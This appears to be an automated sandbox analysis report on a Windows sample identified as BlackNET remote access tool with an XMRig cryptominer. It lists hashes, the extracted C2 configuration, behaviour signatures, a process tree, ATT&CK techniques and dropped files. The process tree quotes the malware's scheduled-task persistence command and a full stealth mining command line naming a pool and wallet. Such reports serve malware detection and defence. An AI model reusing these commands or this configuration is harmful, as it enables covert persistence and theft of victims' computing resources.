Analysis

  • max time kernel
    150s
  • max time network
    162s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    22-07-2021 20:01

General

  • Target

    af711c6269728cc41a4b6cab99dc00d2.exe

  • Size

    3.2MB

  • MD5

    af711c6269728cc41a4b6cab99dc00d2

  • SHA1

    02a1cff69f43552c5aa6fea7547e5f68018dbc84

  • SHA256

    4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c

  • SHA512

    94b6ba8fcdbb5dd175096e305698a41078fb1a99725610bb49159d02ccf2484b01fd7bfcf48fb4644af6b92c77453855f7eba46445f93ff449317f25613bb8a6

Malware Config

Extracted

Family

blacknet

Version

v3.7.0 Public

Botnet

OTwjgZ

C2

http://54.237.66.139

Mutex

BN[a4bfa882efc194e2bcd370ea]

Attributes
  • antivm

    false

  • elevate_uac

    false

  • install_name

    WindowsUpdate.exe

  • splitter

    |BN|

  • start_name

    19eb68018edbdeae69b26450d3d0915f

  • startup

    false

  • usb_spread

    false

Signatures

  • BlackNET

    BlackNET is an open source remote access tool written in VB.NET.

  • BlackNET Payload 5 IoCs
  • Contains code to disable Windows Defender 5 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\af711c6269728cc41a4b6cab99dc00d2.exe
    "C:\Users\Admin\AppData\Local\Temp\af711c6269728cc41a4b6cab99dc00d2.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:584
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "{path}"
      2⤵
        PID:1016
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        "{path}"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4092
        • C:\Users\Admin\AppData\Local\Temp\phone.exe
          "C:\Users\Admin\AppData\Local\Temp\phone.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1532
        • C:\Users\Admin\AppData\Local\Temp\phoneupdate.exe
          "C:\Users\Admin\AppData\Local\Temp\phoneupdate.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2532
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"' & exit
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3960
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"'
              5⤵
              • Creates scheduled task(s)
              PID:2560
          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
            4⤵
            • Executes dropped EXE
            PID:2344
          • C:\Users\Admin\AppData\Roaming\userupdate.exe
            "C:\Users\Admin\AppData\Roaming\userupdate.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2764
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"' & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4060
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"'
                6⤵
                • Creates scheduled task(s)
                PID:1428
            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
              5⤵
              • Executes dropped EXE
              PID:2164
            • C:\Windows\System32\cmd.exe
              C:\Windows/System32\cmd.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.c3pool.com:13333 --user=439KJy5uZoHFetfkQ45pdjRnjLzN1TsFn2NLxPcZbTMwTqJGGpJw4SEM4NhUygc7xacM16VKBNq2Hfe52KmiWTpE46UsCLH --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
              5⤵
              • Blocklisted process makes network request
              • Suspicious use of AdjustPrivilegeToken
              PID:1572

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scripting

    1
    T1064

    Scheduled Task

    1
    T1053

    Persistence

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Scripting

    1
    T1064

    Discovery

    System Information Discovery

    1
    T1082

    Command and Control

    Web Service

    1
    T1102

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\phone.exe
      MD5

      a18b7cb1fe97912ffc3e38d76ccc0462

      SHA1

      c5908c111223d69f532973643381983ba385c1c1

      SHA256

      2d5e2831e24496bd74a7a2317f824657905cdadaeb00f5c6e33e9b75c5231a2f

      SHA512

      d92025f6eb3ab4a594113813284361694ce1b78cfd513d88f4ea842ea7d37c91976066b33089c4da048e39cc4c65654637d2a14138327df40f89d4bb0963be1c

    • C:\Users\Admin\AppData\Local\Temp\phone.exe
      MD5

      a18b7cb1fe97912ffc3e38d76ccc0462

      SHA1

      c5908c111223d69f532973643381983ba385c1c1

      SHA256

      2d5e2831e24496bd74a7a2317f824657905cdadaeb00f5c6e33e9b75c5231a2f

      SHA512

      d92025f6eb3ab4a594113813284361694ce1b78cfd513d88f4ea842ea7d37c91976066b33089c4da048e39cc4c65654637d2a14138327df40f89d4bb0963be1c

    • C:\Users\Admin\AppData\Local\Temp\phoneupdate.exe
      MD5

      c169f9a4c5c32e4ceb4ff58d1c86e969

      SHA1

      8cdad283c3c44202cb3dc50928d8f80ce885715c

      SHA256

      aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6

      SHA512

      3c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b

    • C:\Users\Admin\AppData\Local\Temp\phoneupdate.exe
      MD5

      c169f9a4c5c32e4ceb4ff58d1c86e969

      SHA1

      8cdad283c3c44202cb3dc50928d8f80ce885715c

      SHA256

      aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6

      SHA512

      3c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b

    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
      MD5

      0c0195c48b6b8582fa6f6373032118da

      SHA1

      d25340ae8e92a6d29f599fef426a2bc1b5217299

      SHA256

      11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

      SHA512

      ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      MD5

      94de80b9dbb3379c59a370b83bbffd90

      SHA1

      9b65d5fba13c1174af142de9fdb17cd9989332fc

      SHA256

      5808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b

      SHA512

      1fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7

    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      MD5

      94de80b9dbb3379c59a370b83bbffd90

      SHA1

      9b65d5fba13c1174af142de9fdb17cd9989332fc

      SHA256

      5808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b

      SHA512

      1fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7

    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      MD5

      94de80b9dbb3379c59a370b83bbffd90

      SHA1

      9b65d5fba13c1174af142de9fdb17cd9989332fc

      SHA256

      5808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b

      SHA512

      1fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7

    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      MD5

      94de80b9dbb3379c59a370b83bbffd90

      SHA1

      9b65d5fba13c1174af142de9fdb17cd9989332fc

      SHA256

      5808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b

      SHA512

      1fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7

    • C:\Users\Admin\AppData\Roaming\userupdate.exe
      MD5

      c169f9a4c5c32e4ceb4ff58d1c86e969

      SHA1

      8cdad283c3c44202cb3dc50928d8f80ce885715c

      SHA256

      aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6

      SHA512

      3c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b

    • C:\Users\Admin\AppData\Roaming\userupdate.exe
      MD5

      c169f9a4c5c32e4ceb4ff58d1c86e969

      SHA1

      8cdad283c3c44202cb3dc50928d8f80ce885715c

      SHA256

      aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6

      SHA512

      3c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b

    • memory/584-123-0x0000000006600000-0x0000000006844000-memory.dmp
      Filesize

      2.3MB

    • memory/584-114-0x0000000000050000-0x0000000000051000-memory.dmp
      Filesize

      4KB

    • memory/584-122-0x0000000005ED0000-0x0000000006166000-memory.dmp
      Filesize

      2.6MB

    • memory/584-121-0x0000000000D10000-0x0000000000D12000-memory.dmp
      Filesize

      8KB

    • memory/584-120-0x0000000009500000-0x0000000009501000-memory.dmp
      Filesize

      4KB

    • memory/584-119-0x00000000027C0000-0x00000000027C1000-memory.dmp
      Filesize

      4KB

    • memory/584-118-0x0000000007120000-0x000000000761E000-memory.dmp
      Filesize

      5.0MB

    • memory/584-117-0x0000000007120000-0x0000000007121000-memory.dmp
      Filesize

      4KB

    • memory/584-116-0x0000000007620000-0x0000000007621000-memory.dmp
      Filesize

      4KB

    • memory/1428-179-0x0000000000000000-mapping.dmp
    • memory/1532-148-0x0000028F4F100000-0x0000028F4F101000-memory.dmp
      Filesize

      4KB

    • memory/1532-156-0x0000028F4F480000-0x0000028F4F482000-memory.dmp
      Filesize

      8KB

    • memory/1532-158-0x0000028F4F482000-0x0000028F4F483000-memory.dmp
      Filesize

      4KB

    • memory/1532-159-0x0000028F4F485000-0x0000028F4F487000-memory.dmp
      Filesize

      8KB

    • memory/1532-157-0x0000028F4F483000-0x0000028F4F484000-memory.dmp
      Filesize

      4KB

    • memory/1532-141-0x0000000000000000-mapping.dmp
    • memory/1572-188-0x0000000140000000-0x0000000140758000-memory.dmp
      Filesize

      7.3MB

    • memory/1572-189-0x00000001402EB66C-mapping.dmp
    • memory/1572-190-0x000001142DED0000-0x000001142DEF0000-memory.dmp
      Filesize

      128KB

    • memory/1572-191-0x0000000140000000-0x0000000140758000-memory.dmp
      Filesize

      7.3MB

    • memory/1572-194-0x000001142DF10000-0x000001142DF30000-memory.dmp
      Filesize

      128KB

    • memory/2164-181-0x0000000000000000-mapping.dmp
    • memory/2164-196-0x000000001CAD0000-0x000000001CAD2000-memory.dmp
      Filesize

      8KB

    • memory/2344-176-0x0000000000C60000-0x0000000000C62000-memory.dmp
      Filesize

      8KB

    • memory/2344-174-0x0000000000C30000-0x0000000000C32000-memory.dmp
      Filesize

      8KB

    • memory/2344-168-0x0000000000420000-0x0000000000421000-memory.dmp
      Filesize

      4KB

    • memory/2344-164-0x0000000000000000-mapping.dmp
    • memory/2532-153-0x0000000000D00000-0x0000000000D01000-memory.dmp
      Filesize

      4KB

    • memory/2532-150-0x0000000000000000-mapping.dmp
    • memory/2532-161-0x0000000001890000-0x0000000001892000-memory.dmp
      Filesize

      8KB

    • memory/2532-160-0x000000001CDF0000-0x000000001D00B000-memory.dmp
      Filesize

      2.1MB

    • memory/2560-163-0x0000000000000000-mapping.dmp
    • memory/2764-177-0x000000001CA50000-0x000000001CA52000-memory.dmp
      Filesize

      8KB

    • memory/2764-180-0x00000000019A0000-0x00000000019A1000-memory.dmp
      Filesize

      4KB

    • memory/2764-167-0x0000000000000000-mapping.dmp
    • memory/2764-187-0x00000000019C0000-0x00000000019CA000-memory.dmp
      Filesize

      40KB

    • memory/3960-162-0x0000000000000000-mapping.dmp
    • memory/4060-178-0x0000000000000000-mapping.dmp
    • memory/4092-136-0x0000000009C90000-0x0000000009C91000-memory.dmp
      Filesize

      4KB

    • memory/4092-134-0x0000000009B90000-0x000000000A08E000-memory.dmp
      Filesize

      5.0MB

    • memory/4092-125-0x000000000063636E-mapping.dmp
    • memory/4092-124-0x0000000000400000-0x000000000063C000-memory.dmp
      Filesize

      2.2MB